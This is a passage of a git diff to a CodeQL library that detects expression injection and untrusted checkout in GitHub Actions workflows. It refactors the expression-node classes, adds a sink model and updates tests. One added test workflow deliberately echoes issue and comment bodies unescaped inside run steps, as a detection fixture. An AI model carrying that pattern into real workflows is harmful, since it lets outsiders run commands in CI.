job.getLocation().getFile() - // else - // if this instanceof YamlSequence - // then - // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - // result.getLocation().getFile() = job.getLocation().getFile() - // else none() + result.getFile() = job.getFile() } } @@ -378,9 +497,9 @@ class Job extends WorkflowNode { */ Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } /** * Reusable workflow jobs may have Uses children @@ -448,7 +567,7 @@ abstract class Uses extends WorkflowNode { abstract string getVersion(); - abstract StringLiteral getArgument(string key); + abstract ExpressionNode getArgumentExpr(string key); override string toString() { result = "Uses Step" } } @@ -482,8 +601,11 @@ class UsesStep extends Step, Uses { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - override StringLiteral getArgument(string key) { - result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) + override Expression getArgumentExpr(string key) { + exists(StringValue l | + l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and + result = l.getAnExpression() + ) } override string toString() { @@ -535,8 +657,11 @@ class UsesJob extends Uses { ) } - override StringLiteral getArgument(string key) { - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() + override ExpressionNode getArgumentExpr(string key) { + exists(StringValue l | + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and + result = l.getAnExpression() + ) } } @@ -545,11 +670,11 @@ class UsesJob extends Uses { * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - StringLiteral script; + StringValue script; Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } - StringLiteral getScript() { result = script } + StringValue getScript() { result = script } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" @@ -559,19 +684,29 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends WorkflowNode { - StringLiteral() { +class StringValue extends WorkflowNode { + YamlNode keyNode; + + StringValue() { n instanceof YamlString and exists(YamlCollection c | - c instanceof YamlMapping and - c.(YamlMapping).maps(_, this.asYamlNode()) - or - c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this.asYamlNode() + c = keyNode and + ( + c instanceof YamlMapping and + //c.(YamlMapping).maps(_, this.asYamlNode()) + exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i)) + or + c instanceof YamlSequence and + c.(YamlSequence).getElementNode(_) = this.asYamlNode() + ) ) } string getValue() { result = this.asYamlNode().(YamlString).getValue() } + + YamlNode getKeyNode() { result = keyNode } + + ExpressionNode getAnExpression() { result = this.getAChildNode() } } /** @@ -580,27 +715,16 @@ class StringLiteral extends WorkflowNode { * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} */ -string getASimpleReferenceExpression(YamlString node) { +string getASimpleReferenceExpression(StringValue node, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } -/** - * A StringLiteral containing a workflow expression ${{}}. - */ -class Expression extends StringLiteral { - string expr; - - Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } - - string getExpression() { result = expr } - - Job getJob() { result.getAChildNode*() = this } -} +class Expression extends ExpressionNode { } /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. @@ -608,15 +732,16 @@ class Expression extends StringLiteral { */ class ContextExpression extends Expression { ContextExpression() { - expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - matrixCtxRegex() - ]) + expression + .regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() + ]) } abstract string getFieldName(); - abstract WorkflowNode getTarget(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { @@ -654,15 +779,15 @@ class StepsExpression extends ContextExpression { string fieldName; StepsExpression() { - expr.regexpMatch(stepsCtxRegex()) and - stepId = expr.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + expression.regexpMatch(stepsCtxRegex()) and + stepId = expression.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expression.regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + override AstNode getTarget() { + this.getFile() = result.getFile() and result.(Step).getId() = stepId } } @@ -678,9 +803,9 @@ class NeedsExpression extends ContextExpression { string fieldName; NeedsExpression() { - expr.regexpMatch(needsCtxRegex()) and - neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and - fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + expression.regexpMatch(needsCtxRegex()) and + neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and + fieldName = expression.regexpCapture(needsCtxRegex(), 2) and neededJob.getId() = neededJobId } @@ -688,8 +813,8 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - neededJob.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + neededJob.getFile() = this.getFile() and this.getJob().getANeededJob() = neededJob and ( // regular jobs @@ -711,17 +836,17 @@ class JobsExpression extends ContextExpression { string fieldName; JobsExpression() { - expr.regexpMatch(jobsCtxRegex()) and - jobId = expr.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + expression.regexpMatch(jobsCtxRegex()) and + jobId = expression.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expression.regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Job job | job.getId() = jobId and - job.getLocation().getFile() = this.getLocation().getFile() and + job.getFile() = this.getFile() and job.getOutputs() = result ) } @@ -736,14 +861,14 @@ class InputsExpression extends ContextExpression { string fieldName; InputsExpression() { - expr.regexpMatch(inputsCtxRegex()) and - fieldName = expr.regexpCapture(inputsCtxRegex(), 1) + expression.regexpMatch(inputsCtxRegex()) and + fieldName = expression.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - result.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + result.getFile() = this.getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) or @@ -761,15 +886,15 @@ class EnvExpression extends ContextExpression { string fieldName; EnvExpression() { - expr.regexpMatch(envCtxRegex()) and - fieldName = expr.regexpCapture(envCtxRegex(), 1) + expression.regexpMatch(envCtxRegex()) and + fieldName = expression.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(WorkflowNode s | - s.getEnvVar(fieldName) = result and + s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) } @@ -784,13 +909,13 @@ class MatrixExpression extends ContextExpression { string fieldName; MatrixExpression() { - expr.regexpMatch(matrixCtxRegex()) and - fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + expression.regexpMatch(matrixCtxRegex()) and + fieldName = expression.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll index 402ceae44ce..49b83df48db 100644 --- a/ql/lib/codeql/actions/ast/internal/Yaml.qll +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll @@ -11,7 +11,14 @@ private module YamlSig implements LibYaml::InputSig { import codeql.Locations class LocatableBase extends @yaml_locatable { - Location getLocation() { yaml_locations(this, result) } + Location getLocation() { + exists(@location_default loc, File f, string p, int sl, int sc, int el, int ec | + f.getAbsolutePath() = p and + locations_default(loc, f, sl, sc, el, ec) and + yaml_locations(this, loc) and + result = TBaseLocation(p, sl, sc, el, ec) + ) + } string toString() { none() } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 6015e6336ca..0972ae50039 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -80,7 +80,7 @@ module Completion { } module CfgScope { - abstract class CfgScope extends AstNode { } + abstract class CfgScope extends WorkflowNode { } class WorkflowScope extends CfgScope instanceof Workflow { } @@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutput() or + child = this.(CompositeAction).getAnOutputExpr() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { rank[i](AstNode child, Location l | ( child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getAnOutputExpr() or child = this.(ReusableWorkflow).getStrategy() or child = this.(ReusableWorkflow).getAJob() ) and @@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutput(_) and l = child.getLocation() + child = super.getOutputExpr(_) and l = child.getLocation() | child order by @@ -247,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgument(_) or child = super.getEnvVar(_)) and + (child = super.getArgumentExpr(_) or child = super.getInScopeEnvVarExpr(_)) and l = child.getLocation() | child @@ -261,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvVar(_) or child = super.getScript()) and + (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and l = child.getLocation() | child @@ -271,8 +271,21 @@ private class RunTree extends StandardPreOrderTree instanceof Run { } } +private class StringValueTree extends StandardPreOrderTree instanceof StringValue { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | + child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + | + child order by sl, sc, ec, el, child.toString() + ) + } +} + private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } +private class StringValueLeaf extends LeafTree instanceof StringValue { } + +private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c427f8b828a..008b5a19ce6 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getInScopeEnvVarExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses @@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses @@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 0dea91af2b9..7cfde2a6f9f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,7 +36,7 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvVar(varName) = pred.asExpr() and + r.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript().getValue() and line = script.splitAt("\n") and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 57ef4743487..65e2abaa6c6 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -72,8 +72,7 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a textual representation of this element. */ string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } @@ -85,8 +84,7 @@ class DataFlowCall instanceof Cfg::Node { class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { if this instanceof ReusableWorkflow then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() @@ -162,7 +160,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgument(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** @@ -232,7 +230,7 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvExpression astTo | + exists(AstNode astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( @@ -301,7 +299,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutput(fieldName) and + node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 3a21005e29b..dbae273151b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/actions_github-script.model.yml similarity index 57% rename from ql/lib/ext/PLACEHOLDER.model.yml rename to ql/lib/ext/actions_github-script.model.yml index 2f549573a53..df5b1f70ae5 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,5 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["","","",""] + - ["actions/github-script","*","input.script","expression-injection"] + + diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index ac829c2395e..096c19b48d0 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 02e17b76ac5..0edeb0a7ec8 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 7ca86560998..59a05f64b6c 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index fd4350efae8..040251045c8 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 7b0f3159357..6e88f36fece 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 699c5b2b5dc..4f710a16e8f 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 1f7797b8a0a..590660ce63b 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -43,4 +43,5 @@ where .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 0bf4e858db2..0d0bb39c41e 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -37,4 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getRawExpression() diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 2e3dc7049bd..db341e0c5cc 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -39,8 +39,7 @@ where job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgument("ref") - .(Expression) + .getArgumentExpr("ref") .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", diff --git a/ql/test/library-tests/.github/workflows/expression_nodes.yml b/ql/test/library-tests/.github/workflows/expression_nodes.yml new file mode 100644 index 00000000000..1d40cabdd6a --- /dev/null +++ b/ql/test/library-tests/.github/workflows/expression_nodes.yml @@ -0,0 +1,22 @@ +on: issue_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: LINE 1echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + - run: > + LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' + - run: "LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}'" + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4d290a90604..ca481768671 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,6 +1,36 @@ files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | yamlNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | +| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | @@ -71,15 +101,47 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | 